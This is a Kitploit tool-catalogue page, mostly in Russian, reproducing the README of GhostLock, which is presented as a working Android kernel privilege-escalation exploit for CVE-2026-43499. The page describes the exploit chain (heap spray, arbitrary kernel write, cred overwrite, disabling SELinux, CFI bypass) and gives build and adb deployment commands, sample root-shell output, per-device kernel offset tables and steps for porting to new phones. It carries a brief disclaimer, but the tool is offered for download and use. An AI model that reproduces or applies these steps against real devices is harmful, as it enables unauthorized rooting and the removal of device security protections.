Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
GhostLock — CVE-2026-43499 futex PI stack UAF ???????? - Android GKI 6.1~6.12 ??????? pselect() + futex PI ????????????,??? root ??? SELinux??? OPPO Find X8?OnePlus ?????? | Kitploit
Инструменты/GitHubGitHub/wzhdgithub/ghostlock
Безопасность AndroidПовышение привилегийАнализ уязвимостейЭксплуатацияОбратная инженерияЭксплуатация Бинарных Файлов
GitHubwzhdgithub/ghostlock

GhostLock

CVE-2026-43499 futex PI stack UAF ???????? - Android GKI 6.1~6.12 ??????? pselect() + futex PI ????????????,??? root ??? SELinux??? OPPO Find X8?OnePlus ??????

Репозиторий
3927 дней назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

GhostLock - эксплойт для локального повышения привилегий CVE-2026-43499

Обзор уязвимости

Идентификатор CVE: CVE-2026-43499
Тип уязвимости: UAF (Use-After-Free) в стеке futex PI (наследование приоритета)
Затронутые версии: ядро Linux 6.1 – 6.12 (Android GKI)
Результат эксплуатации: локальное повышение привилегий + отключение SELinux, получение root-оболочки

Принцип работы

Путь срабатывания уязвимости

root@kitploit:~
用户空间 → pselect() → 内核栈上分配 rt_mutex_waiter
                      → futex PI 操作触发 waiter 释放
                      → 释放后的 waiter 内存被 fd_set 操作重用
                      → 通过精心构造的 fd_set 数据控制 waiter 字段
                      → rb_erase() 触发任意内核内存写入

Цепочка эксплуатации

  1. Срабатывание уязвимости: гонка pselect() + futex PI освобождает rt_mutex_waiter в стеке ядра
  2. Контроль раскладки памяти: распыление кучи ядра с помощью pipe_buffer для создания фейкового rt_mutex_waiter
  3. Произвольная запись: используя операции с деревом rb_erase(), запись управляемого указателя по целевому адресу
  4. Путь повышения привилегий:
    • модификация структуры cred: uid/gid → 0, capabilities → все включены
    • отключение SELinux: selinux_state.enforcing → 0
  5. Проверка: повторное сканирование ashmem_fops для подтверждения целостности CFI

Структура проекта

root@kitploit:~
GhostLock/
├── README.md                    # 本文档
├── src/
│   ├── core/                    # 核心利用代码
│   │   ├── main.c               # 主入口,漏洞触发
│   │   ├── pipe.c               # pipe_buffer 喷射
│   │   ├── fops.c               # 文件操作劫持
│   │   ├── root.c               # 提权 + SELinux 禁用
│   │   ├── slide.c              # 内核地址随机化处理
│   │   ├── util.c               # 工具函数
│   │   ├── miniadb.c            # 迷你 ADB 服务器
│   │   ├── common.h             # 公共定义
│   │   ├── target.h             # 目标配置
│   │   ├── offset.h             # 偏移量包含
│   │   ├── runtime_offsets.h    # 运行时偏移表
│   │   └── kernelsnitch/        # 内核地址探测
│   │       ├── kernelsnitch.h
│   │       ├── futex_hash.h
│   │       ├── utils.h
│   │       └── timeutils.h
│   └── devices/                 # 设备适配
│       ├── offsets.h            # 偏移量结构定义
│       ├── findx8/              # OPPO Find X8
│       │   └── offsets.h
│       ├── ace6t/               # OnePlus Ace 6T
│       │   └── offsets.h
│       ├── op15/                # OnePlus 15
│       │   └── offsets.h
│       ├── opd2502/             # OnePlus Pad 2
│       │   └── offsets.h
│       └── rmx5070/             # Realme RMX5070
│           └── offsets.h
├── tools/                       # 辅助工具
│   └── extract_btf.py           # BTF 偏移量提取脚本
├── btf_*.py                     # BTF 分析脚本集合
├── Makefile                     # 构建脚本
├── compile.cmd                  # Windows 编译脚本
├── build.rsp                    # 编译响应文件
└── ghostlock                    # 编译产物(ELF aarch64)

Поддерживаемые устройства

Сборка

Требования к окружению

  • Android NDK r27c или новее
  • Python 3.x (для анализа BTF)
  • Linux/macOS/WSL (рекомендуется Linux)

Шаги сборки

root@kitploit:~
# 1. 设置 NDK 路径
export ANDROID_NDK_HOME=/path/to/android-ndk-r27c

# 2. 编译
make

# 3. 或者直接使用 NDK 编译
$ANDROID_NDK_HOME/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android35-clang \
  --target=aarch64-linux-android35 \
  -O2 -Wall -fPIE -pie -pthread \
  -Isrc/core -Isrc/devices \
  -DTARGET_CONFIG_H=\"target.h\" \
  src/core/*.c -o ghostlock

Сборка в Windows

root@kitploit:~
# 使用提供的 compile.cmd
compile.cmd

Использование

Предварительные требования

  1. На устройстве включена отладка по USB
  2. На компьютере установлены драйверы ADB
  3. Устройство подключено к компьютеру через USB

Шаги

root@kitploit:~
# 1. 确认设备连接
adb devices

# 2. 确认内核版本(必须匹配)
adb shell uname -r
# 期望输出: 6.6.118-android15-8-gebdfad32d749-ab15099304-4k

# 3. 推送 exploit 到手机
adb push ghostlock /data/local/tmp/
adb shell chmod 755 /data/local/tmp/ghostlock

# 4. 运行 exploit
adb shell /data/local/tmp/ghostlock

Пример вывода

root@kitploit:~
[*] GhostLock - CVE-2026-43499 Local Privilege Escalation
[*] Target kernel: 6.6.118-android15-8-gebdfad32d749-ab15099304-4k
[*] KASLR base: 0xffffffc080000000
[*] ashmem_misc: 0xffffffc08227c518
[*] ashmem_fops: 0xffffffc0812ef5c0
[*] SELinux enforcing: 0xffffffc082358ee0
[*] Exploiting...
[+] PSELECT path activated
[+] Pipe merge path activated
[+] Root shell obtained!
[+] SELinux disabled
[*] miniadb listening on USB...

Признаки успеха

  • Появится приглашение # (root-оболочка)
  • Команда id покажет uid=0(root)
  • getenforce вернёт Permissive

Технические детали

Раскладка памяти ядра

root@kitploit:~
KIMAGE_TEXT_BASE = 0xffffffc080000000  (Find X8)
PAGE_OFFSET      = 0xffffffc000000000
PHYS_OFFSET      = 0x40000000
DIRECT_MAP_END   = 0xffffffc400000000  (16GB RAM)

Смещения ключевых символов (Find X8)

Смещения структур (проверено BTF)

Путь эксплуатации

  1. kernelsnitch - сканирование области direct_map для поиска mm_struct
  2. pipe spray - занятие освобождённой памяти waiter с помощью pipe_buffer
  3. pselect trigger - срабатывание UAF, повторное использование освобождённого waiter
  4. rb_erase write - произвольная запись через операции с красно-чёрным деревом
  5. cred patch - изменение учётных данных текущего процесса
  6. SELinux disable - отключение мандатного управления доступом

Адаптация устройств

Добавление нового устройства

  1. Извлечение образа ядра:

    root@kitploit:~
    # 从手机提取 boot.img
    adb pull /dev/block/by-name/boot boot.img
    
    # 或者从固件包中提取
    
  2. Извлечение kallsyms:

    root@kitploit:~
    # 使用 vmlinux-to-elf
    python3 -m vmlinux_to_elf boot.img
    # 选择 "Extract kallsyms" 选项
    
  3. Извлечение информации BTF:

    root@kitploit:~
    python3 btf_task2.py > task_full.txt
    python3 btf_structs2.py > structs.txt
    
  4. Создание записи устройства:

    root@kitploit:~
    mkdir -p src/devices/mydevice
    # 复制现有条目作为模板
    cp src/devices/findx8/offsets.h src/devices/mydevice/
    # 修改偏移量
    
  5. Регистрация устройства: Добавьте в src/devices/offsets.h:

    root@kitploit:~
    #include "mydevice/offsets.h"
    

Способы получения смещений

Вспомогательные скрипты

Скрипты анализа BTF

root@kitploit:~
# 提取 task_struct 完整成员
python3 btf_task2.py > task_full.txt

# 提取所有关键结构体
python3 btf_structs2.py > structs.txt

# 提取特定结构体
python3 btf_selinux.py > selinux.txt
python3 btf_mm.py > mm.txt

# 提取原始 BTF 数据
python3 btf_raw.py > raw.txt

Извлечение kallsyms

root@kitploit:~
# 使用 vmlinux-to-elf
python3 -m vmlinux_to_elf extracted/Image.bin

# 或者使用自定义脚本
python3 run_kallsyms_finder.py

Примечания по безопасности

⚠️ Предупреждение: данный инструмент предназначен только для исследований в области безопасности и авторизованного тестирования. Несанкционированное использование на чужих устройствах является нарушением закона.

Известные ограничения

  • Требуется включённая отладка по USB
  • Требуется подключение ADB (удалённая эксплуатация невозможна)
  • Версия ядра должна точно совпадать
  • На некоторых устройствах могут быть дополнительные механизмы безопасности

Защита CFI

Данный эксплойт обходит защиту Control Flow Integrity (CFI) ядра:

  1. проверка корректности адреса ashmem_fops
  2. использование copy_splice_read в качестве допустимой цели вызова
  3. повторное сканирование для подтверждения целостности CFI

Отладка

Частые вопросы

В: Появляется "no offsets for kernel: xxx" О: Версия ядра не поддерживается — необходимо добавить запись устройства.

В: Эксплойт зависает О: Возможно, гонка не удалась — повторите попытку несколько раз.

В: Возникает kernel panic О: Это маловероятно (panic_on_oops не установлен), но можно проверить dmesg.

Отладочный вывод

root@kitploit:~
# 启用详细输出
adb shell /data/local/tmp/ghostlock -v

# 查看内核日志
adb shell dmesg | tail -50

Связанные ресурсы

  • Подробности CVE-2026-43499
  • Оригинальное исследование GhostLock
  • Ядро Android GKI

Лицензия

Проект распространяется по лицензии MIT.

Благодарности

  • Благодарим всех исследователей безопасности за вклад
  • Благодарим команду безопасности Android за реагирование
  • Благодарим сообщество открытого ПО за поддержку

Последнее обновление: 13 августа 2026 г.
Автор: wzh
Контакт: [email protected]

Скачать инструмент
УстройствоВерсия ядраСтатус
OPPO Find X8 (MT6991)6.6.118-android15✅ Адаптировано
OnePlus Ace 6T6.1.x✅ Проверено
OnePlus 156.1.x✅ Проверено
OnePlus Pad 26.1.x✅ Проверено
Realme RMX50706.1.x✅ Проверено
СимволСмещение
init_task0x0211E280
init_cred0x02130748
selinux_enforcing0x02358EE0
ashmem_misc0x0227C518
ashmem_fops0x012EF5C0
kmalloc_caches0x0167A298
СтруктураПолеСмещение
task_structcred0x820
task_structreal_cred0x818
task_structtasks0x550
task_structpi_lock0x90C
task_structseccomp0x8E8
creduid0x08
credcaps0x30
file_operationsioctl0x48
file_operationssplice_read0xB8
ИнформацияИсточникИнструмент
Адреса символовkallsymsvmlinux-to-elf
Смещения структурBTFbtf_task2.py
Раскладка физической памятиIKCONFIGextract-ikconfig
Версия ядраunameadb shell uname -r